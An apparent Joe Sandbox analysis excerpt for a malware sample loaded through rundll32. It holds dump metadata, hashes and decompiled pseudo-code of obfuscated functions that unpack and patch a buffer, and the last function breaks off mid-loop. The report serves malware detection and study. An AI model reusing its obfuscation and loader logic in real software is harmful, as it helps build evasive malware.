                                                                                                                          0x0079e5b2
                                                                                                                          0x00000000
                                                                                                                          0x0079e5be
                                                                                                                          0x0079e5be
                                                                                                                          0x00000000

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447180476.0000000000791000.00000020.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447175867.0000000000790000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447193918.00000000007B3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_790000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: If$R5C$^Q$`ee$f~8$o`$N
                                                                                                                          • API String ID: 0-3572798563
                                                                                                                          • Opcode ID: 3f4c13052e594095ceec908b648c77d657c97bd5e6a29d2af03061c4db69e6c8
                                                                                                                          • Instruction ID: 58ac87025a874ea0d7832a565d5c042559d4212e1810a48ab5088123ed7862c2
                                                                                                                          • Opcode Fuzzy Hash: 3f4c13052e594095ceec908b648c77d657c97bd5e6a29d2af03061c4db69e6c8
                                                                                                                          • Instruction Fuzzy Hash: A4718672508301DFC758CF22D88985FBBE1EBC4768F544A2DF586962A0D7798A09CF82
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 10014B71 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 70libraryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • _strcpy_s.LIBCMT ref: 10014B9E
                                                                                                                            • Part of subcall function 100311F4: __getptd_noexit.LIBCMT ref: 100311F4
                                                                                                                          • __snprintf_s.LIBCMT ref: 10014BD7
                                                                                                                            • Part of subcall function 1003119A: __vsnprintf_s_l.LIBCMT ref: 100311AF
                                                                                                                          • GetLocaleInfoA.KERNEL32(00000800,00000003,?,00000004), ref: 10014C02
                                                                                                                          • LoadLibraryA.KERNEL32(?), ref: 10014C25
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: InfoLibraryLoadLocale__getptd_noexit__snprintf_s__vsnprintf_s_l_strcpy_s
                                                                                                                          • String ID: LOC
                                                                                                                          • API String ID: 3864805678-519433814
                                                                                                                          • Opcode ID: 993ef955d11e1d056c0da4e243e940ae0abcf9c49e17b7ca6a81ba24efbb4c92
                                                                                                                          • Instruction ID: c6b9acf05ba5f485c5c472c95a6cc1a1d49ea65b07ecc8430683ae88ba63382e
                                                                                                                          • Opcode Fuzzy Hash: 993ef955d11e1d056c0da4e243e940ae0abcf9c49e17b7ca6a81ba24efbb4c92
                                                                                                                          • Instruction Fuzzy Hash: B011E471900118AFDB11DB64CC86BDD73B8EF09315F1241A1F7059F0A1EEB0E9859AD1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 0079CF47 Relevance: 7.9, Strings: 6, Instructions: 380COMMONCrypto
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 94%
                                                                                                                          			E0079CF47(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8, intOrPtr _a12, intOrPtr* _a16, intOrPtr _a20) {
				char _v32;
				intOrPtr _v40;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v88;
				char* _v92;
				char _v112;
				char _v120;
				intOrPtr _v124;
				char _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				void* _t345;
				void* _t377;
				void* _t378;
				void* _t386;
				void* _t393;
				intOrPtr _t403;
				intOrPtr* _t406;
				void* _t408;
				signed char* _t414;
				signed char* _t450;
				intOrPtr* _t455;
				intOrPtr _t456;
				intOrPtr _t457;
				void* _t458;
				signed char* _t459;
				signed int _t460;
				signed int _t461;
				signed int _t462;
				signed int _t463;
				signed int _t464;
				signed int _t465;
				signed int _t466;
				signed int _t467;
				signed int _t468;
				signed int _t469;
				void* _t470;
				void* _t471;
				void* _t474;

				_t406 = _a8;
				_t456 = _a4;
				_push(_a20);
				_t455 = _a16;
				_push(_t455);
				_push(_a12);
				_push(_t406);
				_push(_t456);
				_push(__edx);
				_push(__ecx);
				E007A20B9(_t345);
				_v256 = 0xcf1dac;
				_t471 = _t470 + 0x1c;
				_v256 = _v256 ^ 0x662b1d0f;
				_v256 = _v256 << 2;
				_t408 = 0x8e80a37;
				_v256 = _v256 + 0xffff9089;
				_v256 = _v256 ^ 0x9b8f9315;
				_v160 = 0x25617a;
				_v160 = _v160 << 2;
				_v160 = _v160 ^ 0x009585a8;
				_v264 = 0x39e017;
				_v264 = _v264 + 0xffffbc9c;
				_v264 = _v264 ^ 0xb11c7ead;
				_v264 = _v264 + 0xffffd7b2;
				_v264 = _v264 ^ 0xb125b990;
				_v240 = 0xb82586;
				_t460 = 0x74;
				_v240 = _v240 / _t460;
				_v240 = _v240 << 1;
				_t461 = 0x3b;
				_v132 = _v132 & 0x00000000;
				_v240 = _v240 * 0x36;
				_v240 = _v240 ^ 0x00aace1a;
				_v180 = 0xcab8fe;
				_v180 = _v180 ^ 0xca9451c5;
				_v180 = _v180 | 0x3e03c42f;
				_v180 = _v180 ^ 0xfe5c53ad;
				_v248 = 0x57862;
				_v248 = _v248 | 0x3f7dcfba;
				_v248 = _v248 / _t461;
				_t462 = 0x62;
				_v248 = _v248 / _t462;
				_v248 = _v248 ^ 0x00057d9a;
				_v252 = 0x68f561;
				_v252 = _v252 << 6;
				_v252 = _v252 >> 0xd;
				_v252 = _v252 | 0x3cddc102;
				_v252 = _v252 ^ 0x3cda88f2;
				_v192 = 0x7c8e99;
				_v192 = _v192 + 0x829c;
				_v192 = _v192 * 0x31;
				_v192 = _v192 ^ 0x17fda794;
				_v228 = 0x74d91a;
				_v228 = _v228 << 3;
				_v228 = _v228 + 0x7502;
				_v228 = _v228 * 0x63;
				_v228 = _v228 ^ 0x69a7ce60;
				_v208 = 0xc909ae;
				_v208 = _v208 << 1;
				_t463 = 0xb;
				_v208 = _v208 / _t463;
				_v208 = _v208 ^ 0x00276772;
				_v164 = 0x673800;
				_v164 = _v164 << 9;
				_v164 = _v164 ^ 0xce7e8a93;
				_v232 = 0xb859bd;
				_v232 = _v232 + 0xde76;
				_t464 = 0x5b;
				_v232 = _v232 * 0x1c;
				_v232 = _v232 * 0x30;
				_v232 = _v232 ^ 0xcc63b0a7;
				_v172 = 0x7eda56;
				_v172 = _v172 << 3;
				_v172 = _v172 ^ 0x03f50911;
				_v184 = 0x2f7891;
				_v184 = _v184 / _t464;
				_t465 = 0x41;
				_v184 = _v184 * 0x49;
				_v184 = _v184 ^ 0x0024fbf7;
				_v148 = 0x4a0bea;
				_v148 = _v148 ^ 0x502016f1;
				_v148 = _v148 ^ 0x506ad42a;
				_v260 = 0x9ebd58;
				_v260 = _v260 >> 8;
				_v260 = _v260 << 0xf;
				_v260 = _v260 + 0xb306;
				_v260 = _v260 ^ 0x4f54a3e8;
				_v204 = 0xce3506;
				_v204 = _v204 << 0xf;
				_v204 = _v204 << 0xc;
				_v204 = _v204 ^ 0x300ddb73;
				_v244 = 0xe7c592;
				_v244 = _v244 >> 5;
				_v244 = _v244 ^ 0x506a7775;
				_v244 = _v244 << 1;
				_v244 = _v244 ^ 0xa0d2afa7;
				_v268 = 0x1d8a79;
				_v268 = _v268 << 2;
				_v268 = _v268 / _t465;
				_v268 = _v268 | 0x253986a4;
				_v268 = _v268 ^ 0x2531568a;
				_v216 = 0x116531;
				_t466 = 0x61;
				_v216 = _v216 * 0x66;
				_v216 = _v216 ^ 0xfffdc9ed;
				_v216 = _v216 ^ 0xf917010b;
				_v200 = 0xc05f9c;
				_v200 = _v200 / _t466;
				_v200 = _v200 * 0x6f;
				_v200 = _v200 ^ 0x00dca3d1;
				_v212 = 0xdb89ea;
				_v212 = _v212 >> 0xa;
				_v212 = _v212 >> 9;
				_v212 = _v212 ^ 0x0000ad8d;
				_v152 = 0x38fb70;
				_v152 = _v152 ^ 0x310cc67b;
				_v152 = _v152 ^ 0x313af23a;
				_v136 = 0x7e2008;
				_v136 = _v136 ^ 0x7ad3030b;
				_v136 = _v136 ^ 0x7aaaa86e;
				_v196 = 0x9c4278;
				_t467 = 0x4e;
				_v196 = _v196 * 0x7e;
				_v196 = _v196 ^ 0xa26962db;
				_v196 = _v196 ^ 0xee89d9da;
				_v220 = 0x1e88f4;
				_v220 = _v220 >> 4;
				_v220 = _v220 >> 7;
				_v220 = _v220 ^ 0x000c14cc;
				_v140 = 0xc2e6ba;
				_v140 = _v140 + 0x8875;
				_v140 = _v140 ^ 0x00c43ba1;
				_v188 = 0xdb74c;
				_v188 = _v188 << 4;
				_v188 = _v188 * 0x5c;
				_v188 = _v188 ^ 0x4edda20a;
				_v236 = 0x62ea5;
				_v236 = _v236 / _t467;
				_v236 = _v236 >> 0xb;
				_v236 = _v236 ^ 0x7372adb3;
				_v236 = _v236 ^ 0x73757ff2;
				_v144 = 0x2b6271;
				_v144 = _v144 ^ 0x1ac7dce1;
				_v144 = _v144 ^ 0x1ae73668;
				_v224 = 0x8bb898;
				_v224 = _v224 + 0x43a9;
				_v224 = _v224 << 0x10;
				_t468 = 0x71;
				_t469 = _v132;
				_v224 = _v224 / _t468;
				_v224 = _v224 ^ 0x023712cd;
				_v156 = 0xb23c07;
				_v156 = _v156 + 0x4ded;
				_v156 = _v156 ^ 0x00b7ca1c;
				_v168 = 0xb501ce;
				_v168 = _v168 ^ 0x6706c67f;
				_v168 = _v168 ^ 0x67b3c7a1;
				_v176 = 0xab8984;
				_v176 = _v176 * 0x22;
				_v176 = _v176 ^ 0x16c84308;
				goto L1;
				do {
					while(1) {
						L1:
						_t474 = _t408 - 0xd9acfaa;
						if(_t474 > 0) {
							break;
						}
						if(_t474 == 0) {
							E007A8519(_v236, _v144, _v128);
							_t408 = 0xfbb751f;
							continue;
						}
						if(_t408 == 0x15a913b) {
							_v40 = _t456;
							_v92 =  &_v32;
							_v56 =  *_t455;
							_v52 =  *((intOrPtr*)(_t455 + 4));
							_v88 = 0x20;
							_t393 = E00797735(_v192,  &_v112,  &_v120, _v228, _v208);
							_t471 = _t471 + 0x10;
							if(_t393 == 0) {
								L20:
								return _v132;
							}
							_t408 = 0xf0a856e;
							continue;
						}
						if(_t408 == 0x3749e66) {
							_t469 = E007A0AE0(_v176, _v168);
							_t408 = 0x46acfc9;
							 *((intOrPtr*)(_t406 + 4)) = _v160 + _v124 + _t469;
							continue;
						}
						if(_t408 == 0x46acfc9) {
							_push(_t408);
							_push(_t408);
							_t403 = E00797FF2( *((intOrPtr*)(_t406 + 4)));
							 *_t406 = _t403;
							if(_t403 == 0) {
								_t408 = 0xd9acfaa;
							} else {
								_v132 = 1;
								_t408 = 0xfb3baa2;
							}
							continue;
						}
						if(_t408 != 0x8e80a37) {
							goto L31;
						}
						_t408 = 0xfac38db;
					}
					if(_t408 == 0xf0a856e) {
						_t377 = E007970B3(_v164,  &_v128,  &_v120, _v232, _v172);
						_t471 = _t471 + 0xc;
						if(_t377 == 0) {
							_t408 = 0xfbb751f;
							goto L31;
						}
						_t408 = 0x3749e66;
						goto L1;
					}
					if(_t408 == 0xfac38db) {
						_push( *_t455);
						_t378 = E007AAE6D(_v240,  &_v32,  *((intOrPtr*)(_t455 + 4)), _v180, _t408, _v248);
						_t471 = _t471 + 0x14;
						if(_t378 == 0) {
							goto L20;
						}
						_t408 = 0x15a913b;
						goto L1;
					}
					if(_t408 == 0xfb3baa2) {
						_t457 =  *_t406;
						E00797E87(_v268, _v216, _v200, _t457);
						_t458 = _t457 + _v264;
						E0079ED7E(_v212, _t458, _v152, _v128, _v124);
						_t459 = _t458 + _v124;
						E0079A492(_v196, _v220, _t459, _t469);
						_t450 =  &(_t459[_t469]);
						_t471 = _t471 + 0x20;
						_t414 = _t459;
						if(_t459 >= _t450) {
							L25:
							_t386 = E007A0AE0(0xe, 0);
							_t408 = 0xd9acfaa;
							 *((char*)(_t386 + _t459)) = 0;
							_t456 = _a4;
							goto L1;
						} else {
							goto L22;
						}
						do {
							L22:
							if(( *_t414 & 0x000000ff) == _v256) {
								 *_t414 = 0xc3;
							}
							_t414 =  &(_t414[1]);
						} while (_t414 < _t450);
						goto L25;
					}
					if(_t408 != 0xfbb751f) {
						goto L31;
					}
					E007A8519(_v224, _v156, _v120);
					goto L20;
					L31:
				} while (_t408 != 0x5927677);
				goto L20;
			}












































































                                                                                                                          0x0079cf4e
                                                                                                                          0x0079cf57
                                                                                                                          0x0079cf5f
                                                                                                                          0x0079cf66
                                                                                                                          0x0079cf6d
                                                                                                                          0x0079cf6e
                                                                                                                          0x0079cf75
                                                                                                                          0x0079cf76
                                                                                                                          0x0079cf77
                                                                                                                          0x0079cf78
                                                                                                                          0x0079cf79
                                                                                                                          0x0079cf7e
                                                                                                                          0x0079cf86
                                                                                                                          0x0079cf89
                                                                                                                          0x0079cf93
                                                                                                                          0x0079cf98
                                                                                                                          0x0079cf9d
                                                                                                                          0x0079cfa5
                                                                                                                          0x0079cfad
                                                                                                                          0x0079cfb8
                                                                                                                          0x0079cfc0
                                                                                                                          0x0079cfcb
                                                                                                                          0x0079cfd3
                                                                                                                          0x0079cfdb
                                                                                                                          0x0079cfe3
                                                                                                                          0x0079cfeb
                                                                                                                          0x0079cff3
                                                                                                                          0x0079d001
                                                                                                                          0x0079d006
                                                                                                                          0x0079d00c
                                                                                                                          0x0079d015
                                                                                                                          0x0079d018
                                                                                                                          0x0079d020
                                                                                                                          0x0079d024
                                                                                                                          0x0079d02c
                                                                                                                          0x0079d034
                                                                                                                          0x0079d03c
                                                                                                                          0x0079d044
                                                                                                                          0x0079d04c
                                                                                                                          0x0079d054
                                                                                                                          0x0079d064
                                                                                                                          0x0079d06c
                                                                                                                          0x0079d06f
                                                                                                                          0x0079d073
                                                                                                                          0x0079d07b
                                                                                                                          0x0079d083
                                                                                                                          0x0079d088
                                                                                                                          0x0079d08d
                                                                                                                          0x0079d095
                                                                                                                          0x0079d09d
                                                                                                                          0x0079d0a5
                                                                                                                          0x0079d0b2
                                                                                                                          0x0079d0b6
                                                                                                                          0x0079d0be
                                                                                                                          0x0079d0c6
                                                                                                                          0x0079d0cb
                                                                                                                          0x0079d0d8
                                                                                                                          0x0079d0dc
                                                                                                                          0x0079d0e4
                                                                                                                          0x0079d0ec
                                                                                                                          0x0079d0f8
                                                                                                                          0x0079d0fd
                                                                                                                          0x0079d103
                                                                                                                          0x0079d10b
                                                                                                                          0x0079d116
                                                                                                                          0x0079d11e
                                                                                                                          0x0079d129
                                                                                                                          0x0079d131
                                                                                                                          0x0079d13e
                                                                                                                          0x0079d141
                                                                                                                          0x0079d14a
                                                                                                                          0x0079d14e
                                                                                                                          0x0079d156
                                                                                                                          0x0079d15e
                                                                                                                          0x0079d163
                                                                                                                          0x0079d16b
                                                                                                                          0x0079d17b
                                                                                                                          0x0079d184
                                                                                                                          0x0079d187
                                                                                                                          0x0079d18b
                                                                                                                          0x0079d193
                                                                                                                          0x0079d19e
                                                                                                                          0x0079d1a9
                                                                                                                          0x0079d1b4
                                                                                                                          0x0079d1bc
                                                                                                                          0x0079d1c1
                                                                                                                          0x0079d1c6
                                                                                                                          0x0079d1ce
                                                                                                                          0x0079d1d6
                                                                                                                          0x0079d1de
                                                                                                                          0x0079d1e3
                                                                                                                          0x0079d1e8
                                                                                                                          0x0079d1f0
                                                                                                                          0x0079d1f8
                                                                                                                          0x0079d1fd
                                                                                                                          0x0079d205
                                                                                                                          0x0079d209
                                                                                                                          0x0079d211
                                                                                                                          0x0079d219
                                                                                                                          0x0079d226
                                                                                                                          0x0079d22a
                                                                                                                          0x0079d232
                                                                                                                          0x0079d23a
                                                                                                                          0x0079d247
                                                                                                                          0x0079d248
                                                                                                                          0x0079d24c
                                                                                                                          0x0079d254
                                                                                                                          0x0079d25c
                                                                                                                          0x0079d26a
                                                                                                                          0x0079d273
                                                                                                                          0x0079d277
                                                                                                                          0x0079d27f
                                                                                                                          0x0079d287
                                                                                                                          0x0079d28c
                                                                                                                          0x0079d291
                                                                                                                          0x0079d299
                                                                                                                          0x0079d2a4
                                                                                                                          0x0079d2af
                                                                                                                          0x0079d2ba
                                                                                                                          0x0079d2c5
                                                                                                                          0x0079d2d0
                                                                                                                          0x0079d2db
                                                                                                                          0x0079d2ec
                                                                                                                          0x0079d2ef
                                                                                                                          0x0079d2f3
                                                                                                                          0x0079d2fb
                                                                                                                          0x0079d303
                                                                                                                          0x0079d30b
                                                                                                                          0x0079d310
                                                                                                                          0x0079d315
                                                                                                                          0x0079d31d
                                                                                                                          0x0079d328
                                                                                                                          0x0079d333
                                                                                                                          0x0079d33e
                                                                                                                          0x0079d346
                                                                                                                          0x0079d350
                                                                                                                          0x0079d354
                                                                                                                          0x0079d35c
                                                                                                                          0x0079d36c
                                                                                                                          0x0079d370
                                                                                                                          0x0079d375
                                                                                                                          0x0079d37d
                                                                                                                          0x0079d385
                                                                                                                          0x0079d390
                                                                                                                          0x0079d39b
                                                                                                                          0x0079d3a6
                                                                                                                          0x0079d3ae
                                                                                                                          0x0079d3b6
                                                                                                                          0x0079d3bf
                                                                                                                          0x0079d3c2
                                                                                                                          0x0079d3c9
                                                                                                                          0x0079d3cd
                                                                                                                          0x0079d3d5
                                                                                                                          0x0079d3e0
                                                                                                                          0x0079d3eb
                                                                                                                          0x0079d3f6
                                                                                                                          0x0079d3fe
                                                                                                                          0x0079d406
                                                                                                                          0x0079d40e
                                                                                                                          0x0079d41b
                                                                                                                          0x0079d41f
                                                                                                                          0x0079d41f
                                                                                                                          0x0079d427
                                                                                                                          0x0079d427
                                                                                                                          0x0079d427
                                                                                                                          0x0079d427
                                                                                                                          0x0079d42d
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0079d433
                                                                                                                          0x0079d553
                                                                                                                          0x0079d559
                                                                                                                          0x00000000
                                                                                                                          0x0079d559
                                                                                                                          0x0079d43f
                                                                                                                          0x0079d4e3
                                                                                                                          0x0079d4f6
                                                                                                                          0x0079d4ff
                                                                                                                          0x0079d509
                                                                                                                          0x0079d51f
                                                                                                                          0x0079d52b
                                                                                                                          0x0079d530
                                                                                                                          0x0079d535
                                                                                                                          0x0079d5a7
                                                                                                                          0x0079d5b8
                                                                                                                          0x0079d5b8
                                                                                                                          0x0079d537
                                                                                                                          0x00000000
                                                                                                                          0x0079d537
                                                                                                                          0x0079d44b
                                                                                                                          0x0079d4b7
                                                                                                                          0x0079d4cb
                                                                                                                          0x0079d4d0
                                                                                                                          0x00000000
                                                                                                                          0x0079d4d0
                                                                                                                          0x0079d453
                                                                                                                          0x0079d477
                                                                                                                          0x0079d478
                                                                                                                          0x0079d479
                                                                                                                          0x0079d47e
                                                                                                                          0x0079d484
                                                                                                                          0x0079d498
                                                                                                                          0x0079d486
                                                                                                                          0x0079d486
                                                                                                                          0x0079d491
                                                                                                                          0x0079d491
                                                                                                                          0x00000000
                                                                                                                          0x0079d484
                                                                                                                          0x0079d45b
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0079d461
                                                                                                                          0x0079d461
                                                                                                                          0x0079d569
                                                                                                                          0x0079d6ac
                                                                                                                          0x0079d6b1
                                                                                                                          0x0079d6b6
                                                                                                                          0x0079d6c2
                                                                                                                          0x00000000
                                                                                                                          0x0079d6c2
                                                                                                                          0x0079d6b8
                                                                                                                          0x00000000
                                                                                                                          0x0079d6b8
                                                                                                                          0x0079d575
                                                                                                                          0x0079d65b
                                                                                                                          0x0079d674
                                                                                                                          0x0079d679
                                                                                                                          0x0079d67e
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0079d684
                                                                                                                          0x00000000
                                                                                                                          0x0079d684
                                                                                                                          0x0079d581
                                                                                                                          0x0079d5b9
                                                                                                                          0x0079d5c8
                                                                                                                          0x0079d5d1
                                                                                                                          0x0079d5ee
                                                                                                                          0x0079d5f3
                                                                                                                          0x0079d60e
                                                                                                                          0x0079d613
                                                                                                                          0x0079d616
                                                                                                                          0x0079d619
                                                                                                                          0x0079d61d
                                                                                                                          0x0079d630
                                                                                                                          0x0079d63f
                                                                                                                          0x0079d646
                                                                                                                          0x0079d64b
                                                                                                                          0x0079d64f
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0079d61f
                                                                                                                          0x0079d61f
                                                                                                                          0x0079d626
                                                                                                                          0x0079d628
                                                                                                                          0x0079d628
                                                                                                                          0x0079d62b
                                                                                                                          0x0079d62c
                                                                                                                          0x00000000
                                                                                                                          0x0079d61f
                                                                                                                          0x0079d589
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0079d5a1
                                                                                                                          0x00000000
                                                                                                                          0x0079d6c7
                                                                                                                          0x0079d6c7
                                                                                                                          0x00000000

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447180476.0000000000791000.00000020.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447175867.0000000000790000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447193918.00000000007B3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_790000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: $qb+$rg'$uwjP$za%$M
                                                                                                                          • API String ID: 0-3591755710
                                                                                                                          • Opcode ID: da7435b32c5398bb183d40738941ae657b2ab1072f7b303e1b7fc0a3233c1fa4
                                                                                                                          • Instruction ID: aa17eeec5a758c97ba291d6d7a3847771dd47751d55c936814da4f48ae2f0274
                                                                                                                          • Opcode Fuzzy Hash: da7435b32c5398bb183d40738941ae657b2ab1072f7b303e1b7fc0a3233c1fa4
                                                                                                                          • Instruction Fuzzy Hash: CA121F715083809FD768CF25D48AA5BFBE1FBC4348F20891DF69A8A261DBB59944CF42
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 007A907F Relevance: 7.8, Strings: 6, Instructions: 261COMMONCrypto
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 94%
                                                                                                                          			E007A907F(intOrPtr* __ecx) {
				intOrPtr* _v4;
				char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				unsigned int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				void* _t284;
				void* _t285;
				intOrPtr _t286;
				void* _t293;
				void* _t301;
				signed int _t304;
				signed int _t305;
				signed int _t306;
				signed int _t307;
				signed int _t308;
				void* _t311;
				intOrPtr* _t343;
				void* _t347;
				signed int* _t348;

				_t348 =  &_v132;
				_t343 = __ecx;
				_v4 = __ecx;
				_v40 = 0x7c806d;
				_v40 = _v40 + 0x9e80;
				_v40 = _v40 ^ 0x007d1eed;
				_v12 = 0xea5ac0;
				_v12 = _v12 + 0xffff451e;
				_v12 = _v12 ^ 0x00e99fde;
				_v24 = 0xace3a9;
				_t347 = 0;
				_t304 = 0xa;
				_v24 = _v24 / _t304;
				_v24 = _v24 ^ 0x001149f7;
				_t301 = 0x97dfe60;
				_v112 = 0x63471f;
				_v112 = _v112 ^ 0x706c6b64;
				_v112 = _v112 | 0x0d4cecae;
				_v112 = _v112 << 3;
				_v112 = _v112 ^ 0xea7f67f8;
				_v28 = 0x68a2fc;
				_t305 = 0x5b;
				_v28 = _v28 * 0x1c;
				_v28 = _v28 ^ 0x0b71d390;
				_v84 = 0x508d02;
				_v84 = _v84 | 0x7bfb7ba7;
				_v84 = _v84 ^ 0x7bffa5e3;
				_v124 = 0xc0d8a4;
				_v124 = _v124 + 0xffffd7c7;
				_v124 = _v124 ^ 0xdba96bec;
				_v124 = _v124 + 0xffffcd63;
				_v124 = _v124 ^ 0xdb66cc39;
				_v116 = 0xc7a01f;
				_v116 = _v116 * 0x50;
				_v116 = _v116 << 7;
				_v116 = _v116 + 0x525d;
				_v116 = _v116 ^ 0x3100192e;
				_v88 = 0x173e76;
				_v88 = _v88 / _t305;
				_v88 = _v88 + 0xcdb8;
				_v88 = _v88 ^ 0x00098d3b;
				_v48 = 0x3a45de;
				_t306 = 0x3d;
				_v48 = _v48 / _t306;
				_v48 = _v48 ^ 0x0006d702;
				_v52 = 0xd8d0f7;
				_v52 = _v52 | 0xabcf1793;
				_v52 = _v52 + 0xffff6a1e;
				_v52 = _v52 ^ 0xabd8e28c;
				_v64 = 0xff5420;
				_v64 = _v64 >> 9;
				_v64 = _v64 + 0xffff2626;
				_v64 = _v64 ^ 0xfff0768b;
				_v80 = 0x65116e;
				_v80 = _v80 >> 9;
				_v80 = _v80 | 0xde6750c8;
				_v80 = _v80 ^ 0xde6208e1;
				_v56 = 0x2d6903;
				_v56 = _v56 >> 0xc;
				_v56 = _v56 + 0xffff4c70;
				_v56 = _v56 ^ 0xfff58c10;
				_v132 = 0xe5be5a;
				_v132 = _v132 + 0xfffffbec;
				_v132 = _v132 << 3;
				_v132 = _v132 ^ 0x46ad3c03;
				_v132 = _v132 ^ 0x418237eb;
				_v108 = 0x3fa801;
				_v108 = _v108 + 0x902;
				_v108 = _v108 >> 7;
				_v108 = _v108 ^ 0x9ac0b97a;
				_v108 = _v108 ^ 0x9ac73a04;
				_v72 = 0x454e35;
				_v72 = _v72 + 0x4c9c;
				_t307 = 0x29;
				_v72 = _v72 / _t307;
				_v72 = _v72 ^ 0x000328df;
				_v32 = 0x46b9f;
				_v32 = _v32 >> 4;
				_v32 = _v32 ^ 0x0003d4b9;
				_v16 = 0xab007f;
				_v16 = _v16 ^ 0x56a4e801;
				_v16 = _v16 ^ 0x56002f48;
				_v100 = 0xb9d48c;
				_v100 = _v100 | 0xb434f54e;
				_v100 = _v100 >> 0x10;
				_v100 = _v100 ^ 0x000dcd0e;
				_v92 = 0x17070b;
				_t308 = 0x37;
				_v92 = _v92 / _t308;
				_v92 = _v92 << 7;
				_v92 = _v92 ^ 0x0038b56c;
				_v60 = 0xdb418a;
				_v60 = _v60 * 0x4d;
				_v60 = _v60 << 2;
				_v60 = _v60 ^ 0x07c52fa3;
				_v68 = 0x99d1b0;
				_v68 = _v68 << 1;
				_v68 = _v68 + 0xadc1;
				_v68 = _v68 ^ 0x01384a96;
				_v120 = 0xfb4a64;
				_v120 = _v120 | 0x92bfeeef;
				_v120 = _v120 + 0x1827;
				_v120 = _v120 >> 5;
				_v120 = _v120 ^ 0x0494323d;
				_v128 = 0xf75f57;
				_v128 = _v128 >> 4;
				_v128 = _v128 + 0xe158;
				_v128 = _v128 + 0xffff16ce;
				_v128 = _v128 ^ 0x000f9950;
				_v76 = 0xb94cf;
				_v76 = _v76 | 0xc911a6ab;
				_v76 = _v76 >> 2;
				_v76 = _v76 ^ 0x3240c46f;
				_v104 = 0x7ca07;
				_v104 = _v104 * 0x23;
				_v104 = _v104 >> 4;
				_v104 = _v104 ^ 0xe4d42587;
				_v104 = _v104 ^ 0xe4c14657;
				_v44 = 0x308a5a;
				_v44 = _v44 >> 0x10;
				_v44 = _v44 ^ 0x0006e55e;
				_v96 = 0x427aa5;
				_v96 = _v96 + 0xed3d;
				_v96 = _v96 + 0xffff13f4;
				_v96 = _v96 ^ 0x0046a078;
				_v20 = 0xf8f4;
				_v20 = _v20 * 0x4a;
				_t284 = 0x4469cd4;
				_v20 = _v20 ^ 0x004ab19f;
				_v36 = 0x7998ac;
				_v36 = _v36 >> 0xc;
				_v36 = _v36 ^ 0x0008cf6c;
				do {
					while(_t301 != _t284) {
